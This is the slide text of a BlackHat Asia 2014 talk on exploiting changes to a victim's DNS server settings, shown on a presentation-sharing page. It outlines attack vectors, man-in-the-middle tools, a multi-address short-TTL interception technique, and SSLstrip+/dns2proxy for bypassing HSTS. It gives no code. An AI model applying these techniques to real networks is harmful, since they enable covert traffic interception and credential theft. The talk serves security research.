Se ha denunciado esta presentación.
Utilizamos tu perfil de LinkedIn y tus datos de actividad para personalizar los anuncios y mostrarte publicidad más relevante. Puedes cambiar tus preferencias de publicidad en cualquier momento.

OFFENSIVE: Exploiting DNS servers changes BlackHat Asia 2014

16.866 visualizaciones

Publicado el

Efective exploiting the changes of the DNS Server of a computer (via router hacking or other way...)

Publicado en: Internet

OFFENSIVE: Exploiting DNS servers changes BlackHat Asia 2014

  1. 1. OFFENSIVE: Exploiting changes on DNS server configuration Leonardo Nve Egea lnve@s21sec.com @leonardonve
  2. 2. • Security researcher since… (a lot of time) in SPAIN. • Pentester, Incident investigator & security researcher. • At the Offensive side (more funny). • I love protocol level. About me
  3. 3. INTRODUCTION
  4. 4. What.
  5. 5. Why.
  6. 6. EXPLOITATION (I) NORMAL PROCEDURE
  7. 7. • CSRF/XSS. • Insufficient authorization. • SNMP/TFTP. • Default password + external administration. • Cracking wifi passwords + default password. • Command line DNS change. • Rogue DSLAM. • Malware. How.
  8. 8. What.
  9. 9. • Metasploit. • Dnsmasq. • Bind server. Tools.
  10. 10. • Invisible proxy. – Burp suite, mitmproxy • SSLstrip. • HTML injection. – BeEF – Exploit kits • Bouncing to known servers. – SSLsplit • Fake web servers. – defacing. – Phishing • Sniffing data. Then.
  11. 11. OBSTACLES OF NORMAL EXPLOITATION
  12. 12. • SSL certificates (Critical). Obstacles.
  13. 13. • SSL certificate pinning / EMET (Critical). Obstacles.
  14. 14. • HSTS + Preloaded HSTS sites (Non critical). Obstacles.
  15. 15. • SSH signatures failure (Critical). Obstacles.
  16. 16. • POP3/SMTP Banner (Non critical problem). • FTP Banner (This can be critical). • Limited host interception. • Limited protocol interception. Obstacles.
  17. 17. • Limited of hosts interception. • Time to study IP communication manners. • Limited cleartext protocols interception. • HTTPS. • Accept the loose a lot of information. Limitations.
  18. 18. EXPLOITATION (II) IMPROVE THE ATTACK PROCEDURE
  19. 19. • Discretion. • Improve data acquisitions from time 0. Objectives.
  20. 20. • A DNS feature for high availability and Load Balancing: Improve the attack.
  21. 21. Improve the attack. DHCP REQ DHCP RESP with Fake DNS Server DNS A Request DNS A Request DNS Response DNS Response = IP attacker server1 + IP attacker server2 + DNS Resp Short TTL SYN port=xxx RST ACK port =xxx SYN port=xxx SYN port=xxx SYN ACK port=xxx SYN ACK port=xxx DATA DATA
  22. 22. • On port 80 the attacker can put a invisible proxy. • The attacker can reject SSL ports always because the client will later connect to the real server. • Other connections data will be forward through the evil server since the first moment. • And there is a tool. Improve the attack.
  23. 23. • dns2proxy (still in beta). • Full in python (PyDNS). • Permit spoof, direct forwarding and add IPs to the response. • Interact directly with iptables to forward connections. https://github.com/LeonardoNve/dns2proxy Tool.
  24. 24. Improve the attack.
  25. 25. DEMO (or video if demo effect ;)
  26. 26. • Limited of hosts interception. • Time to study IP communication manners. • Limited cleartext protocol interception. • HTTPS. • Accept the loose a lot of information. Previous limitations.
  27. 27. SSLStrip vs HSTS.
  28. 28. Common SSLStrip usage
  29. 29. • HSTS + Preloaded HSTS sites (Non critical). Obstacles.
  30. 30. • Strict Transport Security based in domain names predefined or not. • Change HTTPS to HTTP. • Also change domain names to connect based on predefined rules. • DNS Server can resolve based on these predefined rules. • HSTS. https://github.com/LeonardoNve/sslstrip2.git SSLStrip+ to defeat HSTS.
  31. 31. DEMO (or video if demo effect…)
  32. 32. SSL in general • You must take advantage with other factors/vulnerabilities
  33. 33. • Downgrade attacks. • JavaScript infections. http://media.blackhat.com/bh-us- 12/Briefings/Alonso/BH_US_12_Alonso_Owning_Bad_Guys_Slides.pdf • For decoding ciphered protocols, go there: More posibilities.
  34. 34. • With UDP the application have the control over the communication not the OS. • If this application resend a lost UDP packet, we have it! If not…  • Dns2proxy is a PoC and only control TCP but it is really easy extend it too UDP. UDP?
  35. 35. Other scenario.
  36. 36. • Improve DNS server configurations hijacks with two tools. • Much information capture than typical attacks. • Old protocols – Old security. • New protocols + Old protocols – Old security+ • Solutions… DNSSEC. Conclusions.
  37. 37. THANKs. Miguel Hernandez The man who first thought `Let’s put a default password. Then they can change it `

×